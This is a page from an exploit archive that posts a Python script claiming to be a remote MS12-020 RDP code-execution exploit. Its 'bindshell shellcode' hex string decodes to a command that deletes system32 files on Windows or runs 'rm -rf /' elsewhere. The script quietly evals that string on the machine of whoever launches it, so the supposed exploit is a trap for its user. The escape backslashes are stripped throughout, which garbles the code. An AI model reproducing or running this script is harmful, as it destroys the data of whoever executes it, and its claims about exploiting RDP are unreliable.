Home / exploitsPDF  

MS12-020 RDP Buffer Overflow

Posted on 28 July 2013

#!/usr/bin/env python
# greating n4sss and foreach my friends and luk3r-C
# xsdev@outlook.com
# rdpxs.py
# MS12-020 RDP, remote exploit code execution
# on all patch machines, XP to 7
# testado nas versoes windows 7 xp e vista com patch.
#
# Author: xscholler

import struct
import socket
import sys
import os

xscholler = "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46xf1"
xscholler += "x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63"
xscholler += "x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a"
xscholler += "x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f"
xscholler += "x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73"
xscholler += "x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c"
xscholler += "x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70"
xscholler += "x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61"
xscholler += "x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33"
xscholler += "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32"
xscholler += "x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e"
xscholler += "x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39"
xscholler += "x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e"
xscholler += "x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51"
xscholler += "x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64"
xscholler += "x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37"
xscholler += "x41" * 39
xscholler += "x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e"
xscholler += "x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73"
xscholler += "x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61"
xscholler += "x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78"
xscholler += "x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e"
xscholler += "x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30"
xscholler += "x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b"
xscholler += "x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b"
xscholler += "x4bx43x58x70x72x69x6ex6dx63x37x66x00"

argument = "x90" * 214

#bindshell PORT 8888
shellcode = "x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x6fx73x27x29x2ex73x79x73"
shellcode += "x74x65x6dx28x27x64x65x6cx20x2fx73x20x2fx71x20x2fx66x20x43x3a"
shellcode += "x5cx77x69x6ex64x6fx77x73x5cx73x79x73x74x65x6dx33x32x5cx2ax20"
shellcode += "x3ex20x4ex55x4cx20x32x3ex26x31x27x29x20x69x66x20x27x57x69x6e"
shellcode += "x27x20x69x6ex20x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x70x6cx61"
shellcode += "x74x66x6fx72x6dx27x29x2ex73x79x73x74x65x6dx28x29x20x65x6cx73"
shellcode += "x65x20x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x6fx73x27x29x2ex73"
shellcode += "x79x73x74x65x6dx28x27x72x6dx20x2dx72x66x20x2fx2ax20x3ex20x2f"
shellcode += "x64x65x76x2fx6ex75x6cx6cx20x32x3ex26x31x27x29x20x23x68x69x20"
shellcode += "x74x68x65x72x65x20x5ex5fx7ex20x66x65x65x6cx20x66x72x65x65x20"
shellcode += "x74x6fx20x73x70x72x65x61x64x20x74x68x69x73x20x77x69x74x68x20"
shellcode += "x74x68x65x20x72x6dx20x2dx72x66x20x72x65x70x6cx61x63x65x64x20"
shellcode += "x77x69x74x68x20x73x6fx6dx65x74x68x69x6ex67x20x6dx6fx72x65x20"
shellcode += "x69x6ex73x69x64x69x6fx75x73"

xst = xscholler + argument

class RDPsocket(socket.socket):
 def __init__(self, payload, shellcode):
 super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
 self.payload = payload
 self.table = __imPORT__("__builtin__").__dict__ #
 self.shellcode = shellcode

 def parse(self, address, shellcode):
 fucker = (struct.pack(">I", 0x6576616c),
 socket.inet_aton(address[0]), #IP bytes
 socket.inet_aton(str(address[1]))) #PORT bytes
 linha = struct.pack(">I", 0x8fe2fb63) #pop eax
 linha += struct.pack(">I", 0x8fe2fb58) #push esp
 linha += struct.pack(">I", 0xffff1d6b) #add esp,byte +0x1c # pop ebp # ret
 linha += struct.pack(">I", 0x8fe2db10) #call strcpy
 linha += struct.pack(">I", 0x8fe2dfd1) #POP - POP - RET over strcpy params
 linha += struct.pack(">I", 0x8fe2dae4) #mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
 linha += struct.pack(">I", 0x8fe2b3d4) #POP - RET
 linha += struct.pack(">I", 0xffffffff) #value to store in ecx
 linha += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
 linha += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += fucker[0] #add the prelude
 linha += fucker[1] #add the packed IP address
 linha += fucker[2] #add the packed PORT
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe2c71d) #mov eax,edx # ret
 linha += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret
 linha += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
 linha += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
 linha += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
 linha += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret # swap back
 linha += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx # copy parameter to placeholder
 linha += struct.pack(">I", 0x8fe2fb61) #mov [eax],edx # pop eax # ret # set our stack pointer back to original value
 linha += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
 linha += struct.pack(">I", 0x8fe2daea) #sub eax,ecx # ret
 linha += struct.pack(">I", 0x8fe0b1c2) #xchg eax,ebp # inc ebp # ret
 linha += struct.pack(">I", 0x8fe2b6a5) #dec ebp # ret
 linha += struct.pack(">I", 0xffff01f3) #mov esp,ebp # pop ebp # ret
 read = self.table[fucker[0]] #reader for the linha shellcode/data

 return str(read(shellcode)), linha

 def connect(self, address):
 self.linha_shell = self.parse(address, shellcode)
 super(RDPsocket, self).connect(address)

 def xst_sendall(self):
 super(RDPsocket, self).sendall(evil + self.linha_shell[0] + self.linha_shell[1])

if __name__ == "__main__":
 if len(sys.argv) != 2:
 print "[*] Usage: python rdpxs.py IP"

 else:
 ALVO = sys.argv[1]
 PORT = 3389 #default RDP PORT

 print "[*] Rodando rdpxs"
 print
 s = RDPsocket(xst, shellcode)
 print "[+] Conectando e configurando payload. . ."
 print "[+] isso pode levar alguns minutos..."
 s.connect((ALVO, PORT))
 print "[+] Conexao estabelecida"
 print "[+] Enviando payload. . ."
 s.xst_sendall()
 response = s.recv(4096)
 if "xA5x43xE7x38x75x84xF2xFFxFFx18x61x00" in response:
 print "[+] Bem Succedido! Payload enviado e executado com sucesso!."
 print "[+] Telnet ALVO na PORT 8888."
 else:
 print "[-] Failed"
 s.close()

 

TOP

Malware :

Exploits :